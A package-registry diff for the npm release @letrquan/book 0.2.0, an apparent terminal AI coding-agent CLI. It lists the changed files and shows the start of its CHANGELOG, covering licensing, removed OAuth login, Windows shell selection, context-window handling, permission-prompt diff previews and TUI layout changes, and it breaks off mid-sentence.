@letrquan/book 0.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (103) hide show
  1. package/CHANGELOG.md +2504 -0
  2. package/LICENSE +123 -0
  3. package/README.md +1383 -0
  4. package/dist/app-MOXXWEOY.js +18945 -0
  5. package/dist/app-MOXXWEOY.js.map +1 -0
  6. package/dist/chunk-24AXE6SP.js +12 -0
  7. package/dist/chunk-24AXE6SP.js.map +1 -0
  8. package/dist/chunk-3U5IBM24.js +213 -0
  9. package/dist/chunk-3U5IBM24.js.map +1 -0
  10. package/dist/chunk-574C6MQR.js +743 -0
  11. package/dist/chunk-574C6MQR.js.map +1 -0
  12. package/dist/chunk-5GDZ22YP.js +449 -0
  13. package/dist/chunk-5GDZ22YP.js.map +1 -0
  14. package/dist/chunk-5KLVH3PY.js +167 -0
  15. package/dist/chunk-5KLVH3PY.js.map +1 -0
  16. package/dist/chunk-5RDRAO4B.js +92 -0
  17. package/dist/chunk-5RDRAO4B.js.map +1 -0
  18. package/dist/chunk-7N4J557C.js +10 -0
  19. package/dist/chunk-7N4J557C.js.map +1 -0
  20. package/dist/chunk-A7JLBK2Y.js +3506 -0
  21. package/dist/chunk-A7JLBK2Y.js.map +1 -0
  22. package/dist/chunk-ANSJPYGI.js +84 -0
  23. package/dist/chunk-ANSJPYGI.js.map +1 -0
  24. package/dist/chunk-BTZZUCLI.js +264 -0
  25. package/dist/chunk-BTZZUCLI.js.map +1 -0
  26. package/dist/chunk-C7D4NJ2D.js +217 -0
  27. package/dist/chunk-C7D4NJ2D.js.map +1 -0
  28. package/dist/chunk-CAGOB2N4.js +208 -0
  29. package/dist/chunk-CAGOB2N4.js.map +1 -0
  30. package/dist/chunk-DGMQEI6Y.js +98 -0
  31. package/dist/chunk-DGMQEI6Y.js.map +1 -0
  32. package/dist/chunk-E75IPST5.js +289 -0
  33. package/dist/chunk-E75IPST5.js.map +1 -0
  34. package/dist/chunk-EYGD6X2T.js +180 -0
  35. package/dist/chunk-EYGD6X2T.js.map +1 -0
  36. package/dist/chunk-GTVB4HEM.js +765 -0
  37. package/dist/chunk-GTVB4HEM.js.map +1 -0
  38. package/dist/chunk-J7MIZ5CA.js +1907 -0
  39. package/dist/chunk-J7MIZ5CA.js.map +1 -0
  40. package/dist/chunk-KWHQ2XXL.js +626 -0
  41. package/dist/chunk-KWHQ2XXL.js.map +1 -0
  42. package/dist/chunk-L6LK2QIQ.js +657 -0
  43. package/dist/chunk-L6LK2QIQ.js.map +1 -0
  44. package/dist/chunk-MAQXCUR4.js +1007 -0
  45. package/dist/chunk-MAQXCUR4.js.map +1 -0
  46. package/dist/chunk-S4XL7HOM.js +402 -0
  47. package/dist/chunk-S4XL7HOM.js.map +1 -0
  48. package/dist/chunk-URLQAXTR.js +60 -0
  49. package/dist/chunk-URLQAXTR.js.map +1 -0
  50. package/dist/chunk-V4BOYR52.js +3504 -0
  51. package/dist/chunk-V4BOYR52.js.map +1 -0
  52. package/dist/chunk-VZQXX3WW.js +210 -0
  53. package/dist/chunk-VZQXX3WW.js.map +1 -0
  54. package/dist/chunk-WKBO5R4O.js +34 -0
  55. package/dist/chunk-WKBO5R4O.js.map +1 -0
  56. package/dist/chunk-XIFFTATU.js +15753 -0
  57. package/dist/chunk-XIFFTATU.js.map +1 -0
  58. package/dist/command-approvals-6Y57VCWZ.js +28 -0
  59. package/dist/command-approvals-6Y57VCWZ.js.map +1 -0
  60. package/dist/context-ZC5IFEAX.js +25 -0
  61. package/dist/context-ZC5IFEAX.js.map +1 -0
  62. package/dist/hook-approvals-CTUFKEJT.js +22 -0
  63. package/dist/hook-approvals-CTUFKEJT.js.map +1 -0
  64. package/dist/index.d.ts +1 -0
  65. package/dist/index.js +2582 -0
  66. package/dist/index.js.map +1 -0
  67. package/dist/interactive-assets-CCAAWVKH.js +31 -0
  68. package/dist/interactive-assets-CCAAWVKH.js.map +1 -0
  69. package/dist/job-runner.d.ts +2 -0
  70. package/dist/job-runner.js +235 -0
  71. package/dist/job-runner.js.map +1 -0
  72. package/dist/loader-4IDS2RIE.js +15 -0
  73. package/dist/loader-4IDS2RIE.js.map +1 -0
  74. package/dist/mcp-approvals-WNPH65BK.js +18 -0
  75. package/dist/mcp-approvals-WNPH65BK.js.map +1 -0
  76. package/dist/mcp-config-YIJIES2C.js +16 -0
  77. package/dist/mcp-config-YIJIES2C.js.map +1 -0
  78. package/dist/model-window-store-YFVNXCIP.js +27 -0
  79. package/dist/model-window-store-YFVNXCIP.js.map +1 -0
  80. package/dist/openai-compatible-RHZUBHV6.js +10 -0
  81. package/dist/openai-compatible-RHZUBHV6.js.map +1 -0
  82. package/dist/permission-approvals-76PVREFD.js +14 -0
  83. package/dist/permission-approvals-76PVREFD.js.map +1 -0
  84. package/dist/permissions-CHCKTFQQ.js +28 -0
  85. package/dist/permissions-CHCKTFQQ.js.map +1 -0
  86. package/dist/sandbox-CNVAQDA7.js +23 -0
  87. package/dist/sandbox-CNVAQDA7.js.map +1 -0
  88. package/dist/scrollback-LUKLIBVI.js +136 -0
  89. package/dist/scrollback-LUKLIBVI.js.map +1 -0
  90. package/dist/sdk.d.ts +4574 -0
  91. package/dist/sdk.js +665 -0
  92. package/dist/sdk.js.map +1 -0
  93. package/dist/settings-loader-M2QP5TX2.js +21 -0
  94. package/dist/settings-loader-M2QP5TX2.js.map +1 -0
  95. package/dist/settings-removed-JWWPT4WA.js +19 -0
  96. package/dist/settings-removed-JWWPT4WA.js.map +1 -0
  97. package/dist/shell-selection-V6QAYXPX.js +17 -0
  98. package/dist/shell-selection-V6QAYXPX.js.map +1 -0
  99. package/package.json +143 -0
  100. package/patches/ink+6.8.0.patch +13 -0
  101. package/scripts/apply-ink-patch.mjs +29 -0
  102. package/scripts/ink-patch.mjs +59 -0
  103. package/scripts/verify-ink-patch.mjs +11 -0
package/CHANGELOG.md ADDED
@@ -0,0 +1,2504 @@
1
+ # Changelog
2
+
3
+ All notable changes to this project are documented in this file.
4
+
5
+ ## [Unreleased]
6
+
7
+ ## [0.2.0] - 2026-09-08
8
+
9
+ ### Added
10
+
11
+ - **Book is published: `npm install -g @letrquan/book`.** The first release anyone outside this
12
+ repository can install. The command is still `book`; the package is scoped because the unscoped
13
+ npm name was taken years ago. `private: true` is gone from `package.json`, deliberately.
14
+
15
+ ### Changed
16
+
17
+ - **Licence: PolyForm Small Business 1.0.0, replacing "all rights reserved".** Publishing a package
18
+ invites people to install and run it, which the previous licence granted no permission to do —
19
+ a contradiction that would have made the release useless to the users it was meant to reach.
20
+ The new terms are source-available: read, modify and redistribute freely, and use it for your own
21
+ work or a company with fewer than 100 people and under 1,000,000 USD (2019) revenue. Larger
22
+ commercial use needs a separate licence. This is not an open-source licence, and does not pretend
23
+ to be one.
24
+
25
+ The published tarball contains source maps with the full TypeScript source. That is now a choice
26
+ rather than an oversight: the licence makes reading the source a right.
27
+
28
+ ### Fixed
29
+
30
+ - **A published install would have had no `book` command.** `bin.book` carried a `./` prefix, and
31
+ `npm publish` drops a bin entry whose path it considers malformed — silently, after which the
32
+ package installs cleanly and provides nothing to run. `npm pack` keeps the entry verbatim and the
33
+ package smoke test invoked `dist/index.js` directly, so neither could see it; only the
34
+ publish-time warning named it. The path is fixed and `scripts/package-smoke.ts` now asserts the
35
+ format at pack time, verified by reintroducing the bug and watching the check fail.
36
+
37
+ ### Known
38
+
39
+ - npm 11 blocks install scripts by default, so the Ink patch does not apply on a fresh
40
+ `npm install -g @letrquan/book`. Book already detects an unpatched Ink and falls back to the
41
+ full-frame `safe` renderer, so the TUI is correct either way — it simply redraws more on macOS
42
+ and Linux, where `incremental` would otherwise be the default. `npm approve-scripts` opts back in.
43
+
44
+ ### Removed
45
+
46
+ - **The adaptive harness and the experimental Zero-Mem capability.** Both were default-off research
47
+ surfaces that no shipped configuration reached, and together they were roughly 10,600 lines —
48
+ about a ninth of the codebase — that every change to the live paths had to be reasoned around.
49
+
50
+ Neither was close to earning that. The harness ledger's own eligibility check reported directory
51
+ sync unavailable, so no `observe` run ever produced promotion-eligible evidence; of its ten
52
+ planned phases three were built and the selector that would have made it a learning system was
53
+ not among them. Zero-Mem needed an optional `@huggingface/transformers` peer and a locally cached
54
+ embedding/NER pair before it could answer a single turn.
55
+
56
+ Gone with them: the `harness.*` and `experimental.*` settings blocks, the `--harness-workflow`
57
+ flag, `BOOK_EXPERIMENTAL_ZERO_MEM`, `BOOK_ZERO_MEM_MODEL_CACHE`, `BOOK_ZERO_MEM_LOCAL_FILES_ONLY`,
58
+ `BOOK_COMPACT_STRATEGY`, the `eval:zero-mem` script, and the `@huggingface/transformers` peer
59
+ dependency. Production summary compaction is untouched, including the Carried Ledger and the
60
+ residual tail; `compactStrategy` remains `summary` and is now the only strategy.
61
+
62
+ **A removed setting costs you the key, not your install.** `compactStrategy: "zero-mem"` would
63
+ otherwise fail the whole settings document against the surviving literal type and stop Book from
64
+ starting, with a validator dump naming no remedy — so removed values are dropped and removed
65
+ blocks are reported instead. `book doctor` lists the removed keys still present in each settings
66
+ layer and in the environment, and says what to delete.
67
+
68
+ - **Subscription authentication over OAuth.** Book supports API-key authentication only. The
69
+ `book auth` subcommand (`login`, `logout`, `status`), the `/login` slash command and TUI login
70
+ picker, the `auth` configuration block, and subscription credential resolution across provider
71
+ transports have been removed entirely, without shims or compatibility aliases.
72
+
73
+ The feature could not work as shipped. Book bundled no vendor client IDs, which required users to
74
+ supply their own OAuth client ID that neither Anthropic nor OpenAI publishes for third-party CLI
75
+ use. In addition, the built-in `codex` profile targeted an endpoint that the OpenAI-compatible client
76
+ cannot speak (it appends `/chat/completions`, whereas that host serves the Responses API). Carrying
77
+ a non-functional credential path is worse than not having one; Book now authenticates exclusively
78
+ via API keys (`BOOK_API_KEY`, `provider.<id>.apiKey`, and `{env:VAR}` references).
79
+
80
+ **If you ever ran `book auth login`, delete `<BOOK_HOME>/auth.json`** (normally
81
+ `~/.book/auth.json`) and revoke the token with the provider. It holds a long-lived OAuth refresh
82
+ token that nothing in Book reads, reports or revokes any more; the file is left in place rather
83
+ than deleted for you, because a tool that removes credentials without being asked is worse than
84
+ one that tells you they are there. `book doctor` names the file while it exists, and the "no
85
+ credential" error names the removal when a stale `auth` block was your only configured one.
86
+
87
+ ### Changed
88
+
89
+ - **New default theme: `apple`.** The interactive TUI now opens on a calmer, Apple-inspired
90
+ palette — near-black neutral surfaces, bright grey text, and one blue accent for the things you
91
+ act on (the composer and your own turns). Every other hue is a status colour that appears only
92
+ when a state needs attention, so ordinary chrome never competes with the work. `/theme auto` on a
93
+ dark terminal also resolves to `apple`. The previous warm editorial palette is still available as
94
+ `/theme dark`, and an explicit `theme` setting is honoured unchanged.
95
+ - The composer keeps a steady focus frame instead of recolouring its border with every permission
96
+ mode; the status line carries the mode, and reserves saturated colour for non-default modes,
97
+ warnings, and context pressure near the limit. Healthy usage stays quiet.
98
+ - Inline code in assistant replies is marked by colour alone; the background pill behind every
99
+ span is gone, so a paragraph full of identifiers no longer reads as a row of badges. The
100
+ `mdInlineCodeBg` token is still accepted in custom theme files but no longer paints anything.
101
+
102
+ ### Fixed
103
+
104
+ - **`Bash` no longer runs through `cmd.exe` on Windows.** Node's `shell: true` means `%ComSpec%`,
105
+ so a tool named `Bash` was spawning `cmd.exe`: one command per line, `%VAR%` quoting, no
106
+ heredocs, and the shell models write worst. The system prompt told the model to expect that
107
+ rather than fixing it, which traded the model's strongest syntax for its weakest on the one
108
+ platform Book is developed on — where `Bash` is by some distance the most-failing tool.
109
+
110
+ Book now resolves a real shell once per session and tells the model which one it got. On Windows:
111
+ `BOOK_SHELL` or the `shell` setting, then **Git Bash when Book was launched from one**, then
112
+ **PowerShell 7**, then **Windows PowerShell 5.1**, then an installed Git Bash, and `cmd.exe` only
113
+ when nothing else exists. macOS and Linux keep the platform default. The resolved shell rides on
114
+ the config, so the tool, the system prompt, and `book doctor` cannot disagree about which shell
115
+ is in force, and the Harness prompt line now states that shell's actual syntax rules instead of
116
+ warning the model off Windows.
117
+
118
+ A real shell is spawned as an argument vector, reusing the form sandboxing already used;
119
+ `cmd.exe` and `/bin/sh` still go through `shell: true`, because `cmd.exe` quoting cannot be
120
+ reproduced from an argv. PowerShell is driven with `-EncodedCommand`, since 5.1 re-parses a
121
+ `-Command` argument and silently strips embedded double quotes. Under 5.1 the error stream is
122
+ merged and each record rendered as text: left alone, that shell serializes a redirected stderr as
123
+ CLIXML, so a failing `Get-Item` handed the model an XML document instead of `Cannot find path`.
124
+ Exit codes still follow the last statement, verified against the real interpreter.
125
+
126
+ `shell` is stripped from both workspace settings layers and refused by `book config` there, on
127
+ the same reasoning as `auth`: it names the program every command is handed to, so a repository
128
+ that could set it would run a binary it ships on the first call.
129
+
130
+ - **Inline reasoning tags no longer leak into a subagent's live transcript.** Routers that inline
131
+ a model's thinking as `<think>…</think>` emit an empty block ahead of every tool call. Each one
132
+ rendered as a `thought · 0 lines` row — a toggle that expanded to nothing — stacked between every
133
+ wave of tool rows, in both the main transcript and a child's. Empty blocks are now dropped. While
134
+ a managed child's turn was still open, its detail view printed the raw stream buffer, so the same
135
+ reasoning that the settled transcript collapses to a `thought` row appeared verbatim, tags and
136
+ all; the live turn is now rendered as a streaming assistant message, with the same reasoning
137
+ split, markdown, and width as every settled one, and honours `ui.showThinking`. The buffer that
138
+ drives it is also cleared when the finished message lands, so the text no longer showed twice
139
+ and no longer accumulated across the child's later turns.
140
+ - **A print run that was cut off no longer reports success.** `--print` ended with exit code 0 after
141
+ emitting `Reached max turns (150)`, so a CI step, a wrapper that resumes on failure, or any script
142
+ reading `$?` could not tell a finished objective from one abandoned at the turn limit. In print
143
+ mode the exit code is the whole contract — there is no human watching the transcript to notice.
144
+
145
+ The agent loop had already done its half: the max-turns branch produces a `failed` terminal
146
+ outcome, as do `no_progress`, `blocked_plan`, `continuation_limit` and a budget stop. What was
147
+ missing was the last hop — the CLI awaited the headless run and discarded its result, so the
148
+ process fell through to 0. It now reads the outcome and exits 1 on any failed status, keyed on the
149
+ status rather than on the reason, so a failure mode added later is covered without being
150
+ remembered.
151
+
152
+ **A user cancelling is not a failure.** Ctrl-C and an abort signal keep exiting as they did, with
153
+ a test pinning it, so a later change cannot quietly turn someone pressing Ctrl-C into a red CI
154
+ run. And because a consumer parsing the stream should not have to infer this from an exit code,
155
+ the `result` event now carries `stopReason`.
156
+
157
+ - **A learned context window can no longer be lost, raised, or set above the real window.** Book
158
+ records a ceiling for a model when a provider refuses a request for exceeding its context limit,
159
+ in `<BOOK_HOME>/model-windows.json`, so the next session sizes compaction against a number the
160
+ provider has shown it will not accept. A review of that store found the recorded number was
161
+ wrong in three independent ways, each of which the file's own design claimed to prevent.
162
+
163
+ **The value was the size that was refused.** History alone can exceed the window — a 100k model
164
+ handed 150k of history refuses, and 150k was stored as the window, half again larger than
165
+ reality. The ceiling is now a fixed fraction of the refused size
166
+ (`LEARNED_WINDOW_SAFETY_MARGIN`), so it lands below the real window in one step instead of
167
+ decaying toward it through a sequence of failed turns the user watches. The old comment argued
168
+ the estimate was conservative by comparing it to the refused *prompt*; the value is stored as the
169
+ *window*, so that reasoning never applied to what the code did.
170
+
171
+ **"Strictly downward" only held inside one process.** The store cached the file at session start
172
+ and wrote the whole document back from that snapshot, so two concurrent sessions — a TUI beside a
173
+ `--print` run, managed agents in worktrees, a background job — dropped each other's entries, and
174
+ a session holding a stale snapshot would happily restore a ceiling another had just lowered.
175
+ A write is now computed from a fresh read and merged per model by minimum, so a concurrent
176
+ lowering is never undone.
177
+
178
+ **One malformed entry discarded all of them.** The document was validated in a single pass, so a
179
+ truncated write, a hand edit, or an entry written by a future version emptied the store for every
180
+ model — and the next refusal persisted that empty document, making it permanent. Entries are now
181
+ validated individually and a bad one costs only itself; a file whose version is newer than this
182
+ build is read but never rewritten.
183
+
184
+ Alongside: `book doctor` lists every learned window and when it was learned, `/context` and the
185
+ status line name which source the window came from, and the family table gained `gpt-4` (8k),
186
+ `gpt-4-32k` (32k), and `gpt-3.5-turbo` (16k) — the families where falling back to the 272k
187
+ default is most dangerous, and the ones the table's own sizing rule was written for. A window
188
+ declared in settings still wins over everything above.
189
+
190
+ - **A turn that is only an unclosed reasoning block is retried, not accepted as the answer.** A
191
+ `--print` run finished with exit code 0 and an "answer" that was leaked chain-of-thought from its
192
+ first byte to its last: one `<reasoning_context>` tag, never closed, ending mid-sentence on a tool
193
+ call the model had serialized as prose. The empty-turn check reads only closed tags on purpose —
194
+ a finished answer may open with an unfenced `<thinking>`, and stripping it would fail a run that
195
+ had answered — so the leak passed as a reply, and in print mode nothing downstream could tell.
196
+
197
+ The discriminator is the shape itself: the block starts the content, is never closed, and no
198
+ answer text stands beside it. That turn now gets the same single retry an empty turn gets
199
+ (`isUnclosedReasoningOnly` in `src/reasoning-tags.ts`), since there is no answer there to
200
+ protect. If the retry comes back the same shape the text is kept as the answer, as before, never
201
+ discarded — so the worst case for an answer that merely opens with `<thinking>` is one spare
202
+ request. Text before the opening tag, a tool call, or a closed block leave the reading unchanged.
203
+
204
+ - **The permission prompt shows what is being approved.** The card is where consent is given, and
205
+ it rendered the whole payload as a fixed 72-character slice with nothing marking the cut, so a
206
+ command that continued past that point read as if it ended there — `… && echo cleaned` for a
207
+ command whose tail was the part worth reading — with half the row left empty. File mutations
208
+ were worse: `Edit`, `MultiEdit`, `Write`, and `ApplyPatch` showed only the path, because the
209
+ diff those tools return exists only after the file is written. The user was asked to approve a
210
+ change they could not see.
211
+
212
+ A shell command now renders in full, every line of it, hard-wrapped to the card's interior
213
+ rather than word-wrapped, since a command's spacing is part of the command. When it still needs
214
+ a bound the bound is a count of rows, the cut is marked (`… 7 more rows · D shows all`), and `D`
215
+ opens it. A short argument stays on the header row as before.
216
+
217
+ File mutations show the diff they would produce, computed before anything is written from the
218
+ pending call's arguments against the file on disk, with the same matching the tool will use
219
+ (`src/tools/mutation-preview.ts`, reusing the tools' own edit and hunk appliers and rendered
220
+ through the transcript's `DiffBlock`). A change that cannot be previewed says why — `Cannot
221
+ preview: oldString not found in file`, or a patch that names one file twice — which is the
222
+ matching failure the tool was about to report, so the user can skip a call that is going to
223
+ fail instead of approving it first. (The tools' file-provenance gate, which refuses to mutate a
224
+ file the session has not read, is not previewed.) Previews are change-focused and bounded by
225
+ the terminal: eight diff rows on a tall terminal, fewer on a short one, and a patch across many
226
+ files shows as many as that budget can give a meaningful diff and counts the rest; `D` opens
227
+ them to what the terminal can hold, and is offered only when it would show more. A
228
+ worktree-isolated managed agent previews against its own checkout. The screen-reader rendering
229
+ reads the whole command and a per-file summary of lines added and removed.
230
+
231
+ Along the way the line diff (`src/tools/diff.ts`) now trims the lines shared at both ends
232
+ before building its LCS table, so a one-line edit deep in a twenty-thousand-line file costs a
233
+ handful of cells rather than four hundred million; the mutation tools, which run the same diff
234
+ after every write, get the same saving.
235
+
236
+ ### Added
237
+
238
+ - **Learned context-window store and downward ratchet on provider overflow.** For unknown models
239
+ or local routers whose `/v1/models` endpoint exposes no context lengths, Book now learns a context
240
+ ceiling from the provider's context overflow refusal instead of repeating the overflow every session.
241
+
242
+ Learned ceilings are stored per model in `<BOOK_HOME>/model-windows.json` (via atomic temp-file replace),
243
+ isolated from the workspace tree so repositories cannot tamper with learned limits. When a provider
244
+ refuses a request with a context overflow error and the context window in force was not explicitly
245
+ declared by the user in settings, the conservative history token estimate at the moment of refusal is
246
+ recorded. The ratchet is strictly monotonic downward: subsequent overflows at a smaller size lower the
247
+ ceiling, while overflows at larger sizes change nothing, and explicit user settings declarations remain
248
+ authoritative and are never overwritten.
249
+
250
+ `ContextWindowSource` is extended with `'learned'` in the four-state precedence:
251
+ `declared -> learned -> family -> default`. The learned origin is surfaced in `/context` breakdown
252
+ reports with an explanation of the refusal signal, in the `/context` command panel metric card
253
+ (`(learned)`), and as a trailing annotation on the responsive TUI status line (`(learned)` on wide
254
+ terminals).
255
+
256
+ - **Model family context-window table and three-state source reporting.** Previously,
257
+ `resolveContextLimit()` returned the fallback `DEFAULT_CONTEXT_WINDOW = 272_000` for every model
258
+ that did not explicitly declare a per-model `contextWindow` in settings. On 1M-context models such
259
+ as Gemini Flash behind router prefixes (`9router/ag/gemini-3.8-flash-high`), premature
260
+ auto-compactions were triggered against the 272k ceiling.
261
+
262
+ Book now resolves context windows through `resolveContextWindow()` across a three-state source
263
+ precedence: explicit declaration in `modelInfo.contextWindow` (`declared`), matching a known
264
+ conservative family prior (`family`), or the product fallback (`default`). A built-in family
265
+ table covers Gemini Flash (1,048,576 tokens), Claude 3+ (200,000 tokens), GPT-4o (128,000 tokens),
266
+ GPT-4 Turbo (128,000 tokens), and OpenAI o-series (128,000 tokens), stripping router paths and date
267
+ stamps during normalization; families whose published window varies too widely across variants
268
+ — Qwen being the case in point, 32k to 1M — are deliberately left to the default so the user is
269
+ prompted to declare one. The three-state source is threaded through `/context` reports, the
270
+ `/context` command panel metric card (`(default)`, `(family)`, or unadorned when declared), and the
271
+ responsive TUI status line (`(family)` or `(default)` on wide terminals, dropping out first when
272
+ space is tight). Because initial tool discovery derives its schema token budget from
273
+ `window * 0.05`, models resolving to 128k families receive a proportionally tightened eager tool
274
+ catalog (6,400 tokens, down from the 8,000-token cap applied at 272k).
275
+
276
+ - **`/login` — subscription sign-in from inside the TUI.** Subscription auth shipped as
277
+ `book auth login` and nothing else: no slash command, no import from `src/auth/` anywhere under
278
+ `src/tui/`, and no credential row in `/status`. A user who never left the TUI had no way to
279
+ discover the feature existed, and no way to see which credential a session was spending.
280
+
281
+ `/login` now lists the configured profiles with their credential and client-id state, opens the
282
+ browser, waits on the loopback redirect, and reports the outcome — driving the same
283
+ `runOAuthLogin` the CLI drives, which was written host-agnostically for this. `/login <profile>`
284
+ preselects one rather than auto-starting, so a flow that opens a browser and binds a registered
285
+ port always begins on a keystroke the user aimed. Esc aborts in flight, and the overlay's effect
286
+ cleanup aborts on unmount, so a closed overlay cannot leave the listener holding the port.
287
+ Selecting a profile with no client id shows the same guidance the CLI prints without binding
288
+ anything. `/status` gained an `Auth` row naming the active profile, or `API key`.
289
+
290
+ **Storing a credential does not spend it.** `selectAuthProfile` deliberately refuses to retarget
291
+ a workspace that already has a working key, and the TUI only started because something
292
+ authenticated — so inferred activation would have left the new login doing nothing visible,
293
+ reproducing inside the feature the invisibility that motivated it. The success step asks; accepting
294
+ persists `auth.profile` to the user-global layer (the only layer `auth.*` is read from) and
295
+ re-points the live config, so the next turn spends the subscription without a restart. Declining
296
+ says how to switch later.
297
+
298
+ **Activation is resolved before it is offered.** Because it persists `auth.profile` globally, a
299
+ combination that cannot work would not just fail this session — it would fail every later session
300
+ in every project, from a single keystroke, with no way back through the overlay. So
301
+ `activateAuthProfile` computes the outcome first and refuses with a reason when a base-URL
302
+ override points away from the profile's origin (where `assertOriginAllowed` would reject every
303
+ request), when the selected model resolves to a `provider/<id>` entry that carries its own
304
+ endpoint and key, or when `BOOK_AUTH_PROFILE` names something else. Nothing is written in those
305
+ cases. A compact model configured for the previous vendor is reported as a warning instead. The
306
+ consent prompt names the model and endpoint the session will really use, which differs from the
307
+ profile's own whenever an explicit override wins — and `/model` now records its choice as
308
+ explicit, so a later login cannot quietly undo it.
309
+
310
+ The endpoint/model/transport precedence an active profile contributes now lives in one exported
311
+ function (`authProfileContribution`), called by both `loadConfig` and the mid-session path.
312
+ Two copies would drift, and drift here is silent: a session spending a subscription against the
313
+ wrong endpoint, or keeping a model the new vendor does not serve.
314
+
315
+ Logout and the `--manual` paste-back flow remain CLI-only.
316
+
317
+ ### Changed
318
+
319
+ - **Compaction keeps the recent history it is entitled to (Carried Ledger Phase 1).** After an
320
+ auto-compaction the retained tail was capped at a flat 20,000 tokens whatever the window, and a
321
+ single turn with dozens of tool calls exceeds that even after clipping, so at the 272k default
322
+ window compaction kept nothing verbatim: seven of eight real compactions in the owner's sessions
323
+ retained zero messages and collapsed 167k-219k tokens to a 0.2k-6.7k checkpoint. The tail is now
324
+ the residual of the post-compaction target (`resolveCompactBudgets` in `src/agent/compact.ts`).
325
+ The target is half the loop's preflight gate net of the request overhead the loop measures
326
+ (system prompt, tool schemas, session state), so after a compaction the whole request sits at
327
+ half the gate and the next compaction is as far away as the request is large; the tail is that
328
+ target less the checkpoint budget and its header. At 272k with the 64k default reserve that is
329
+ ~79k tokens of verbatim recent history with no overhead, ~73k against this repository's ~12k
330
+ prompt, instead of 20k. The loop and the compactor size from the one resolver, so the output
331
+ reserve is clamped to half the window on both sides: a 32k local model under Book's 64k default
332
+ reserve was refused every tool-bearing request before the provider was called (issue #189). The
333
+ per-result clip scales with the tail (~7.9k tokens per retained tool result at 272k instead of
334
+ 2k) and the loop's preflight clip uses the same cap, falling back to the flat cap only when the
335
+ request would still be refused. The short 20k tail stays where it is the right answer: the
336
+ recovery compaction after a provider rejects a request as too large always keeps it, because the
337
+ residual was sized for a window the provider has just said it does not have, and every trigger
338
+ falls back to it when the residual would summarize nothing. A compaction that fires on
339
+ provider-measured usage also shrinks its target by the ratio of measured to estimated tokens, so
340
+ an undercounting estimator (CJK prose, base64) cannot size a tail that does not fit. The fidelity
341
+ harness runs two arms, a 32k window with a 4k reserve and the 272k production window, with
342
+ per-arm floors in `FIDELITY_ARMS`: post-history utilization is measured against the loop's own
343
+ gate and flipped from a 0.15 ceiling to a floor (0.47 and 0.48 measured), final retention at 272k
344
+ measured 0.833, and retention precision is recorded per arm because the old 0.898 mostly measured
345
+ an empty tail. Cost: post-compaction requests carry ~4x more history and compactions fire more
346
+ often (the headroom to the next preflight at 272k is the post-compaction request itself, ~83k
347
+ tokens, instead of ~140k). The `run-book` mock provider gained content-matched turns so a scripted
348
+ session survives the reducer's request landing at any index, an `--overflow-above` switch that
349
+ refuses oversized requests the way a model with a smaller real window does, and a request log in
350
+ the OS temp directory.
351
+
352
+ - **The TUI uses the whole terminal — and its floating panels still don't.** Every row resolved its
353
+ position through a transcript grid that capped the measure at 120 columns, so on a 200-column
354
+ terminal the transcript, the composer border and the turn rules all stopped two thirds of the way
355
+ across and the rest of the window sat blank. The cap kept prose from running long, but a window
356
+ that renders half empty does not read as a chosen line length: it reads as a bug, and it wrapped
357
+ the diffs and code this UI mostly exists to show while the space to hold them went unused.
358
+
359
+ The fix is not to delete the cap but to split it, because content and chrome want opposite things
360
+ from a wide terminal. **Content takes the terminal**: transcript prose, diffs, turn rules, the
361
+ status line, and the composer, which is the surface whose half-width border made the window look
362
+ broken in the first place. **Chrome stays bounded** (`panelGrid`, 120 columns): the slash-command
363
+ menu, the `@file` and skill pickers, `/config`, the skill manager, the rules panel, the question
364
+ and elicitation dialogs. Uncapping those had drawn a 199-column border around a list of
365
+ forty-column rows — the same defect as a half-empty window wearing the opposite mask.
366
+
367
+ **Aligned tool rows are bounded too** (`MAX_ROW_MEASURE`). A tool row right-aligns its metadata so
368
+ the eye can scan that column down a turn, and at full width `31ms` sat 170 columns from the
369
+ command it timed, which is not alignment but distance. Rows now lay out within 120 columns and
370
+ agree with each other at any terminal size; the gap between target and metadata is bounded again,
371
+ so a streaming frame no longer rebuilds hundreds of columns of padding per visible row.
372
+
373
+ Terminals at or below 120 columns render exactly as before, byte for byte. `PermissionsPanel`
374
+ carried a second, independent `min(width, 120)` and a wrapper whose border stretched to the full
375
+ terminal while its text stopped at column 114; both now come from `panelGrid`, so the rules end
376
+ where the box does.
377
+
378
+ - **`/config` stops answering the same question two ways.** The command was two products under one
379
+ name. Bare `/config` opened the settings menu, whose rows write the layer each setting belongs to
380
+ -- user-global for model, compact model, effort, permission default and the display toggles;
381
+ workspace-local for theme, skill overrides and per-profile agent models -- and take effect
382
+ immediately. `/config <key>=<value>` sent *everything* to `<workspace>/.book/settings.local.json`
383
+ and reported "(next session)". So the same setting had two homes and two moments depending on
384
+ which half of one command you used, and one screen could show both answers at once --
385
+ `/config theme=light` printed `Set theme = "light" ... (next session).` directly above a menu row
386
+ still reading `T Theme dark`. `book config set`, which had defaulted to the user layer for
387
+ exactly this reason, was a third opinion.
388
+
389
+ The typed form now runs the same guarded write as `book config set` -- user-global by default,
390
+ `--local` / `--project` / `-g` to name a layer, at most one of them -- and inherits the three
391
+ guards it never had. A key outside the schema (`/config maxTruns=12`) used to report success and
392
+ change nothing forever; so did a trust-owned key like `permissions.projectAllowRules`, which no
393
+ loader reads from a settings file at all. And a value that is valid alone but breaks the *merge*
394
+ is refused before it lands, rather than after, when every command that could remove it already
395
+ fails at load.
396
+
397
+ The eight settings a running session holds rather than re-reads -- `model`, `compactModel`,
398
+ `effort`, `theme`, `defaultMode`, `ui.showThinking`, `ui.startupAnimation`, `memory.autoSave` --
399
+ are handed to the effect the menu row and the dedicated command already use, so `/config model=x`
400
+ is `/model x`. Writing them to a file was the original lie: the session never re-reads it, so the
401
+ command reported a switch that had not happened. Each lands in the layer that setting belongs to,
402
+ which is why naming a scope now means something specific: asking for the layer a setting already
403
+ uses is the same request as asking for none and still takes the live path, while asking for a
404
+ different file gets a literal write and a reply saying the change waits for the next start.
405
+ `--global model=x` writing the same file as the bare form but skipping the live apply was the
406
+ divergence this entry exists to remove, reappearing inside the fix.
407
+
408
+ The write itself now lives in `src/settings-write.ts`, called by both surfaces, because two
409
+ copies of a layer policy is how they came to disagree in the first place. Two long-standing holes
410
+ in it are closed while it is one function: a write is now checked against every layer resolved
411
+ *after* it rather than only against the two below `user`, so `--project` no longer reports success
412
+ for a value the local layer still decides, and a `--settings` override that defines the key is
413
+ reported too, since it is merged last of all. The refusals for `experimental.*` and `auth.*` say
414
+ they apply in every scope instead of pointing the reader at `<BOOK_HOME>/settings.json` -- the
415
